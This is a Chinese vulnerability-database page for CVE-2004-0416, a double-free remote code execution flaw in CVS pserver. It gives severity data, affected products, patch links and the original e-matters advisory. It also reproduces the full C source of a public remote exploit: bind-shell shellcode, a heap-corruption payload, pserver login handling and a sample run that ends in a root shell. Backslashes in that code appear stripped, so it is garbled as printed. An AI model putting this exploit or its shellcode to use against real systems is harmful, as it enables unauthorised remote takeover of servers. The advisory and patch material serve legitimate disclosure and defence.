CVE-2004-0416
CVSS10.0
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:45:11
NMCOEP    

[原文]Double free vulnerability for the error_prog_name string in CVS 1.12.x through 1.12.8, and 1.11.x through 1.11.16, may allow remote attackers to execute arbitrary code.


[CNNVD]CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞(CNNVD-200408-055)

        
        Concurrent Versions System (CVS)是一款开放源代码的版本控制软件。
        CVS "Argumentx"命令存在两次释放问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        "Argumentx" 命令允许为先前提供的参数增加更多数据,这可以通过对最后一个存储参数进行重分配来操作,但是"Argumentx"没有检查在参数列表中是否有任何参数,因为当客户端断开连接的时候程序会释放这个列表,如果列表是空的,realloc()调用就会去试图释放一个不应该被这样操作的指针。此"double-free()"漏洞在多个Linux系统上成功利用。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:cvs:cvs:1.11.10
cpe:/a:cvs:cvs:1.11.11
cpe:/a:sgi:propack:2.4SGI ProPack 2.4
cpe:/a:sgi:propack:3.0SGI ProPack 3.0
cpe:/a:cvs:cvs:1.11.16
cpe:/a:cvs:cvs:1.11.14
cpe:/a:cvs:cvs:1.11.15
cpe:/a:cvs:cvs:1.11.4
cpe:/o:openbsd:openbsd:3.4OpenBSD 3.4
cpe:/a:cvs:cvs:1.11.1_p1
cpe:/a:cvs:cvs:1.11.3
cpe:/a:cvs:cvs:1.12.2
cpe:/a:openpkg:openpkg:1.3OpenPKG 1.3
cpe:/a:cvs:cvs:1.11.2
cpe:/a:cvs:cvs:1.12.1
cpe:/a:cvs:cvs:1.11.1
cpe:/a:openpkg:openpkg:2.0OpenPKG 2.0
cpe:/a:cvs:cvs:1.12.7
cpe:/a:cvs:cvs:1.10.8
cpe:/a:cvs:cvs:1.11
cpe:/a:openpkg:openpkgOpenPKG
cpe:/a:cvs:cvs:1.10.7
cpe:/a:cvs:cvs:1.11.6
cpe:/a:cvs:cvs:1.12.5
cpe:/a:cvs:cvs:1.11.5
cpe:/o:openbsd:openbsd:3.5OpenBSD 3.5
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/a:cvs:cvs:1.12.8
cpe:/o:openbsd:openbsdOpenBSD

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:994CVS error_prog_name Double-free Vulnerability
oval:org.mitre.oval:def:10070Double free vulnerability for the error_prog_name string in CVS 1.12.x through 1.12.8, and 1.11.x through 1.11.16, may allow remote attacker...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0416
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0416
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-055
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
(UNKNOWN)  SGI  20040604-01-U
ftp://patches.sgi.com/support/free/security/advisories/20040605-01-U.asc
(UNKNOWN)  SGI  20040605-01-U
http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/022441.html
(UNKNOWN)  FULLDISC  20040609 Advisory 09/2004: More CVS remote vulnerabilities
http://marc.info/?l=bugtraq&m=108716553923643&w=2
(UNKNOWN)  BUGTRAQ  20040611 [OpenPKG-SA-2004.027] OpenPKG Security Advisory (cvs)
http://security.e-matters.de/advisories/092004.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/092004.html
http://security.gentoo.org/glsa/glsa-200406-06.xml
(UNKNOWN)  GENTOO  GLSA-200406-06
http://www.debian.org/security/2004/dsa-519
(VENDOR_ADVISORY)  DEBIAN  DSA-519
http://www.mandriva.com/security/advisories?name=MDKSA-2004:058
(UNKNOWN)  MANDRAKE  MDKSA-2004:058
http://www.redhat.com/support/errata/RHSA-2004-233.html
(UNKNOWN)  REDHAT  RHSA-2004:233

- 漏洞信息

CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞
危急 未知
2004-08-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Concurrent Versions System (CVS)是一款开放源代码的版本控制软件。
        CVS "Argumentx"命令存在两次释放问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        "Argumentx" 命令允许为先前提供的参数增加更多数据,这可以通过对最后一个存储参数进行重分配来操作,但是"Argumentx"没有检查在参数列表中是否有任何参数,因为当客户端断开连接的时候程序会释放这个列表,如果列表是空的,realloc()调用就会去试图释放一个不应该被这样操作的指针。此"double-free()"漏洞在多个Linux系统上成功利用。
        

- 公告与补丁

        厂商补丁:
        CVS
        ---
        目前厂商已经在1.11.17及1.12.9版的软件中修复了这个安全问题,请到厂商的主页下载:
        https://ccvs.cvshome.org/files/documents/19/194/cvs-1.11.17.tar.gz
        https://ccvs.cvshome.org/files/documents/19/201/cvs-1.12.9.tar.gz
        或者绿盟科技建议您运行通过SSH chrooted的CVS server来代替:pserver:模式:
        
        http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt

- 漏洞信息 (392)

Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit (EDBID:392)
linux remote
2004-08-13 Verified
2401 Gyan Chawdhary
N/A [点击下载]
* Remote CVS <= 1.11.15 exploit for the error_prog_name double free vuln. 
* 
* by Gyan Chawdhary, gunnu45@hotmail.com 
* 
* Vulnerability Description: 
* 
* The Vulnerability lies in the serve_argumentx function. The Argumentx 
command 
* parameter is used to append data to a previously supplied Argument 
command. 
* These data pointers are stored in the argument_vector array. The 
* serve_argumentx fails to check wether an Argument command is present in 
the 
* argument_vector and may append data to a pointer that should not get 
* touched at all, in our case the *error_prog_name string. The function 
calls 
* realloc to create space for the new string. Because realloc will be called 
* to store strlen(error_prog_name) + strlen(somedata) the original chunk 
which 
* just stores error_prog_name will get freed. This free chunk will once 
again 
* get freed after we disconnect from the CVS pserver. 
* 
* Theory: 
* 
* Sucessful exploitation depends heavily on a specific heap layout to be 
met. 
* The argument_vector is initialized for holding 3 ptrs. If more space is 
* required it will call realloc. The error_prog_name string resides right 
* after the argument_vector chunk. 
* 
* |11| arg_vector |11| error_prog_name |109| some chunk 
* 
* address of error_prog_name is stored in the argument_vector[0]. 
* 
* To achive sucessfull exploitation the following steps are performed. 
* 
* 1) Send Argumentx command with a large argument to reallocate 
error_prog_name 
* + large command on top of the heap. This will free the original 
* error_prog_name buffer. 
* 
* 2) Send 50 Argument calls which will require the argument_vector array to 
be 
* reallocated freeing the current buffer. We keep this a high number to get 
* mem from the top itself and to make the exploit reliable. As both the 
* original the arg_vector & err_prg_name buffers are free they are 
* consolidated. Also we supply our fake chunk and shellcode in this call. 
* 
* 3) Send an argument command with the size & prevsize as its arguments. 
This 
* will now be stored in arg_vector & err_prg_name consolidated buffer. 
* 
* 4) Once we close the connection free will be called on the error_prog_name 
* string which will read our fake size & prev_size fields pointing to the 
fake 
* chunk , executing our shellcode. 
* 
* Phew !!!! 
* 
* NOTES: Iv tried this exp on RH 8 with glibc 2.3.*. This exp did NOT work 
on 
* my slack 8.0 cause of glibc 2.2 which creates a very different heap 
layout. 
* Also some tweaking will be required to use this exploit remotely as 
sometimes 
* the overwritten GOT does not execute due to early drop in the connection 
.. 
* Please someone figure it out n mail me :) .. 
* 
* Now the exploit 
* 
* FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL 
* PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR 
* EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL 
PURPOSE * 
* Greets: jp - for his cool paper on advanced malloc exploits, and the 
heapy.so 
* jaguar@felinemenace - We at ... :P 
* 
* cya 
* 
* Gyan 
*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <string.h> 

#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 

char shellcode[] = 
"xebx18" 
"AAAAAAAAAAAAAAAAAAAAAAAA" 
"x31xc0" // xorl %eax,%eax 
"x31xdb" // xorl %ebx,%ebx 
"x31xc9" // xorl %ecx,%ecx 
"x31xd2" // xorl %edx,%edx 
"xb0x66" // movb $0x66,%al 
"xb3x01" // movb $0x1,%bl 
"x51" // pushl %ecx 
"xb1x06" // movb $0x6,%cl 
"x51" // pushl %ecx 
"xb1x01" // movb $0x1,%cl 
"x51" // pushl %ecx 
"xb1x02" // movb $0x2,%cl 
"x51" // pushl %ecx 
"x8dx0cx24" // leal (%esp),%ecx 
"xcdx80" // int $0x80 

/* port is 30464 !!! */ 
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */ 
"xb3x02" // movb $0x2,%bl 
"xb1x02" // movb $0x2,%cl 
"x31xc9" // xorl %ecx,%ecx 
"x51" // pushl %ecx 
"x51" // pushl %ecx 
"x51" // pushl %ecx 
/* port = 0x77, change if needed */ 
"x80xc1x77" // addb $0x77,%cl 
"x66x51" // pushl %cx 
"xb1x02" // movb $0x2,%cl 
"x66x51" // pushw %cx 
"x8dx0cx24" // leal (%esp),%ecx 
"xb2x10" // movb $0x10,%dl 
"x52" // pushl %edx 
"x51" // pushl %ecx 
"x50" // pushl %eax 
"x8dx0cx24" // leal (%esp),%ecx 
"x89xc2" // movl %eax,%edx 
"x31xc0" // xorl %eax,%eax 
"xb0x66" // movb $0x66,%al 
"xcdx80" // int $0x80 

/* listen(fd, 1) */ 
"xb3x01" // movb $0x1,%bl 
"x53" // pushl %ebx 
"x52" // pushl %edx 
"x8dx0cx24" // leal (%esp),%ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x66" // movb $0x66,%al 
"x80xc3x03" // addb $0x3,%bl 
"xcdx80" // int $0x80 

/* cli = accept(fd, 0, 0) */ 
"x31xc0" // xorl %eax,%eax 
"x50" // pushl %eax 
"x50" // pushl %eax 
"x52" // pushl %edx 
"x8dx0cx24" // leal (%esp),%ecx 
"xb3x05" // movl $0x5,%bl 
"xb0x66" // movl $0x66,%al 
"xcdx80" // int $0x80 

/* dup2(cli, 0) */ 
"x89xc3" // movl %eax,%ebx 
"x31xc9" // xorl %ecx,%ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x3f" // movb $0x3f,%al 
"xcdx80" // int $0x80 

/* dup2(cli, 1) */ 
"x41" // inc %ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x3f" // movl $0x3f,%al 
"xcdx80" // int $0x80 

/* dup2(cli, 2) */ 
"x41" // inc %ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x3f" // movb $0x3f,%al 
"xcdx80" // int $0x80 

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */ 
"x31xdb" // xorl %ebx,%ebx 
"x53" // pushl %ebx 
"x68x6ex2fx73x68" // pushl $0x68732f6e 
"x68x2fx2fx62x69" // pushl $0x69622f2f 
"x89xe3" // movl %esp,%ebx 
"x8dx54x24x08" // leal 0x8(%esp),%edx 
"x31xc9" // xorl %ecx,%ecx 
"x51" // pushl %ecx 
"x53" // pushl %ebx 
"x8dx0cx24" // leal (%esp),%ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x0b" // movb $0xb,%al 
"xcdx80" // int $0x80 

/* exit(%ebx) */ 
"x31xc0" // xorl %eax,%eax 
"xb0x01" // movb $0x1,%al 
"xcdx80"; // int $0x80 

void login(char *, char *, char *); 

struct           sockaddr_in s; 
int             sock; 

void xp_connect(char *ip) 
{ 
        char buffer[1024]; 
        char temp[1024]; 
        int tmp; 

        s.sin_family = AF_INET; 
        s.sin_port = htons(2401); 
        s.sin_addr.s_addr = inet_addr(ip); 

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) 
        { 
                printf("Cannot create socketn"); 
                exit(-1); 
        } 

        if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 
0) 
        { 
                printf("Cannot connect()n"); 
                exit(-1); 
        } 
} 

void xp_write(char *data) 
{ 

if(write (sock, data, strlen(data)) < 0) 
{ 
printf("write() failedn"); 
exit(-1); 
} 
} 

void xp_receive() 
{ 
int tmp; 
char buffer[1024*2]; 

if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0) 
{ 
printf("read() failedn"); 
exit(-1); 
} 
printf("%s", buffer); 
} 




#define GOT_MEMCPY 0x80d2b4a 
#define SHELL_ADDR 0x080cda20 

char *egg(unsigned int what, unsigned int where) 
{ 
        char *ptr, *buf; 
        int i=0; //dummy = 0xfffffffc; 
        int size = strlen(shellcode); 

        // Will contain our fake chunk supplided with our fd & bk fields, 
        // addr of shellcode & got addr - 8 of free(). We will also try to 
        // stuff in our shellcode in the same buffer as I dont have enough 
        // gdb patience/time   to find nother controlable buffer :P 
        buf = (char *)malloc(1250); 
        ptr = buf; 

        for (;i<1248;) { 

        *( (int **)ptr ) = (int *)( where - 8 ); 
        ptr+=4; 
        *( (int **)ptr ) = (int *)( what ); 
        ptr+=4; 

        i+=8; 
        } 
        buf[1250] = ''; 
        ptr -= size; 
strcpy(ptr, shellcode); 
        ptr = buf; 
        return ptr; 

} 

unsigned char shifts[] = { 
      0,   1,   2,   3,   4,   5,   6,   7,   8,   9, 10, 11, 12, 13, 14, 15, 
      16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 
      114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 
      111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 
      41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 
      125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 
      36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 
      58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 
      225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 
      199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 
      174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 
      207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 
      192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 
      227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 
      182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 
      243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 }; 

char   *scramble(char * str) 
{ 
    int                 i; 
    char                 * s; 

    s = (char *) malloc (strlen (str) + 3); 
    memset(s, '', strlen(str) + 3); 
    *s = 'A'; 
    for (i = 1; str[i - 1]; i++) 
    s = shifts[(unsigned char)(str[i - 1])]; 
    return (s); 
} 

#define LOGIN "BEGIN AUTH REQUESTn/home/cvsrootn%sn%snEND AUTH 
REQUESTn" 
#define REQUEST "Root %sn" 

void login(char *login, char *password, char *repo) 
{ 
char *buf, *ptr, reply[1024]; 
char *rep, *rp; 
buf = (char *)malloc(1024); 
rep = (char *)malloc(512); 

ptr = buf; 
rp = rep; 
sprintf(ptr, LOGIN, login, scramble(password)); 
sprintf(rp, REQUEST, repo); 

ptr = buf; 

xp_write(ptr); /* login request */ 
xp_receive(); 
xp_write(rp); /* root dir request */ 


} 

char argumentx[] = "Argumentx %sn"; 
char argument[] =   "Argument %sn"; 
char trash[] = "FCUK"; 
char str[] = "Argument x42x42x42x42x6exffxffxffx1cxfcxffxff" 
    "xf0xffxffxffx41x41n"; 

void overflow() 
{ 
  char *data, *dptr, *buf, *bufp, *eg, *arg, *aptr; 
int i; 
data = (char *)malloc(111111); 
dptr = data; 
buf = (char *)malloc(111111+20); 
bufp = buf; 
arg = (char *)malloc(1500); 
aptr = arg; 


memset(dptr, 'x41', 111111); 
sprintf(bufp, argumentx, data); 
xp_write(bufp); 

eg = egg(0x80d2b4a, 0x080cda20); 
sprintf(aptr, argument, eg); 

for (i=0 ; i<50; i++) 
xp_write(aptr); 

xp_write(str); 
xp_write(trash); 
} 



void usage(char *name) 
{ 
printf("CVS <= 1.11.15 Argumentx double free() remote exploit by Gyan" 
      "Chawdhary (gunnu45@hotmail.com)n" 
              "Usage: %s <options>n" 
      "-i <target IP address>n" 
      "-l <login>n" 
      "-p <password>n" 
      "-r <repository path>nn", name); 
} 



main(int argc, char **argv) 
{ 
int c; 
char ip[16], user[32], pass[32], rep[512]; 

ip[0] = 0; 
user[0] = 0; 
pass[0] = 0; 
rep[0] = 0; 

if (argc < 2) { 
usage(argv[0]); 
exit(0); 
} 

while ((c = getopt(argc, argv, "h::l:p:i:r:")) != -1) { 

switch(c) { 

case 'h': 
usage(argv[0]); 
exit(0); 
case 'i': 
strncpy(ip, optarg, sizeof(ip)); 
break; 
case 'l': 
strncpy(user, optarg, sizeof(user)); 
break; 
case 'p': 
strncpy(pass, optarg, sizeof(pass)); 
break; 
case 'r': 
strncpy(rep, optarg, sizeof(rep)); 
break; 
} 
} 

if(ip) { 
printf("Connecting to vulnerable CVS server ..."); 
xp_connect(ip); 
printf("OKn"); 
} 

        printf("Logging in ..."); 
        login(user, pass, rep); 
printf("OKn"); 

      printf("Exploiting the CVS error_prog_name double free now ..."); 
      overflow(); 
      printf("DONEn"); 
      printf("If everything went well there should be a shell on port 
30464n"); 
} 





//xp_connect("127.0.0.1"); 
//sleep(20); 
//login("gyan", "gyan"); 
//overflow(shellcode); 

/* 

[root@ill crazy]# ./free -i 127.0.0.1 -l gyan -p gyan -r /home/cvsroot 
Connecting to vulnerable CVS server ...OK 
Logging in ...I LOVE YOU 
OK 
Exploiting the CVS error_prog_name double free now ...DONE 
If everything went well there should be a shell on port 30464 
[root@ill crazy]# telnet 127.0.0.1 30464 
Trying 127.0.0.1... 
Connected to localhost.localdomain (127.0.0.1). 
Escape character is '^]'. 

*/ 

// milw0rm.com [2004-08-13]
		

- 漏洞信息 (F33521)

092004.txt (PacketStormID:F33521)
2004-06-10 00:00:00
Stefan Esser  security.e-matters.de
advisory,vulnerability
CVE-2004-0414,CVE-2004-0416,CVE-2004-0417,CVE-2004-0418
[点击下载]

A team audit of the CVS codebase has revealed more security related problems. The vulnerabilities discovered include exploitable, potentially exploitable and simple crash bugs. Vulnerable versions are CVS feature releases up to 1.12.8 and stable release up to 1.11.16.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           e-matters GmbH
                          www.e-matters.de

                      -= Security  Advisory =-



     Advisory: More CVS remote vulnerabilities
 Release Date: 2004/06/09
Last Modified: 2004/06/09
       Author: Stefan Esser [s.esser@e-matters.de]

  Application: CVS feature release <= 1.12.8
               CVS stable release  <= 1.11.16
     Severity: Vulnerabilities within CVS allow remote compromise of
               CVS servers.
         Risk: Critical
Vendor Status: Vendor has released bugfixed versions.
    Reference: http://security.e-matters.de/advisories/092004.html


Overview:

   Concurrent Versions System (CVS) is the dominant open-source version 
   control software that allows developers to access the latest code using
   a network connection. 
   
   A team audit of the CVS codebase has revealed more security related 
   problems. The vulnerabilties discovered include exploitable, potentially
   exploitable and simple crash bugs.
   
   
Details:
   
   During the analysis of the cvshome.org hack incident Derek Robert Price
   discovered a null-termination issue in the patch for the previous
   CVS security issue. This issue was not deeply analysed but it is
   believed that it can only cause crashes.
   
   At the same time Sebastian Krahmer from SuSE and I started together
   a deeper audit of the CVS codebase. This process revealed several 
   problems which are listed below. This includes those found by S. Krahmer
   
   [ error_prog_name "double-free()" - found by SE ]
   
   The "Argumentx" command allows to add more data to a previously supplied
   argument. This is done by reallocating the last stored argument.
   Unfourtunately "Argumentx" does not check if there is any argument in
   the argument list. If the list is empty realloc() will be called on a
   pointer that should not get touched at all, because it will get free()d
   when the client disconnect. This "double-free()" bug has been exploited
   successfully on several linux systems.
   
   [ wrapper.c format string issues - found by SE ]
   
   The CVS wrapper file allows to specify format strings. These strings are
   trusted by the CVS server without any sanity check. A malformed wrapper
   line could crash the server or possibly execute arbitrary code. However
   an attacker needs CVSROOT commit access to trigger this, which is the
   highest access level.
   
   [ serve_max_dotdot integer overflow - found by SE ]
   
   An integer overflow within the "Max-dotdot" CVS protocol command allows
   crashing the CVS server. While CVS server processes are usually forked
   a crash usually leaves data in the temporary file directory. This means
   on non partitioned servers this bug could be used to fill the hard-disk
   to the rim.
   
   [ serve_notify() out of bound writes - found by SK ]
   
   Serve_notify() does not properly handle empty data lines. If an empty 
   data line is supplied by an attacker serve_notify() will access data 
   outside the allocated buffer. If a specific memory layout is met, this
   can be abused to write a single byte outside the buffer. Depending on
   the underlying memory allocating routines, this could be used to 
   execute arbitrary system on the target system. An exploit for this
   problem is not yet finished.
   
   [ getline == 0 bugs - found by SK ]
   
   When reading some configuration files from CVSROOT empty lines could
   cause one byte underflows. Because an attacker needs CVSROOT commit 
   access to trigger this bug it was not further analysed. Additionally
   this bug should only cause problems on big endian systems.
   
   [ Argument (and other) integer overflows - found by SK ]
   
   With the new release a bunch of possible integer multiplication overflows
   are fixed. Some of them are only triggerable with CVS commit access or
   with huge amounts of data. In cases like the Argument command the
   overflow is not triggerable, because the requested allocation size will 
   exceed the free address space before the overflow can happen. This results
   in realloc() returning a NULL pointer which is then used as base pointer
   for following array accesses. If an attacker is able to cause realloc()
   to fail in the right moment this may allow him to overwrite vital data
   structures with pointers to his data.
   

Proof of Concept:

   e-matters is not going to release an exploit for any of these 
   vulnerabilities to the public.
   

Disclosure Timeline:

   20. May 2004  - Derek Robert Price informed vendor-sec and some
                   individuals about the cvshome.org hack and that he
		   found a bug that was introduced by the previous
		   security update
   21. May 2004  - Sebastian Krahmer and I reported to the same people,
                   that we had started on a team audit of CVS and already
		   had discovered some bugs
   27. May 2004  - A patch for the discovered vulnerabilities and
                   a final report about the problems was delivered
	           to those involved in the disclosure process
   28. May 2004  - Pre notification process started. The same parties
                   were warned
   09. June 2004 - Coordinated Public Disclosure

   
CVE Information:

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the following names to the discussed vulnerabilities
   
        CAN-2004-0414 - no-null-termination of "Entry" lines
   
        CAN-2004-0416 - error_prog_name "double-free()"
   
        CAN-2004-0417 - Argument integer overflow
   
        CAN-2004-0418 - serve_notify() out of bounds writes
   
   Please note, that only CAN-2004-0416 was discovered by e-matters. For
   the other vulnerabilities within this advisory no additional names
   were assigned.
   

Recommendation:

   Recommended is an immediate update to the new version. Additionally you
   should consider running your CVS server chrooted over SSH instead of 
   using the :pserver: method. You can find a tutorial how to setup such a
   server at
   
   http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt
   
   
GPG-Key:

   http://security.e-matters.de/gpg_key.asc
    
   pub  1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam 
   Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA  A71A 6F7D 572D 3004 C4BC


Copyright 2004 Stefan Esser. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAxyajb31XLTAExLwRAsGhAKCtWZ4LPmhWGL5LPwLw0rdLcRJK9QCgzwAa
g8QiBoU/d9w24xQdZp22CO0=
=pJWH
-----END PGP SIGNATURE-----
    

- 漏洞信息

6831
CVS error_prog_name Double-Free Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-06-10 Unknow
2004-08-15 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站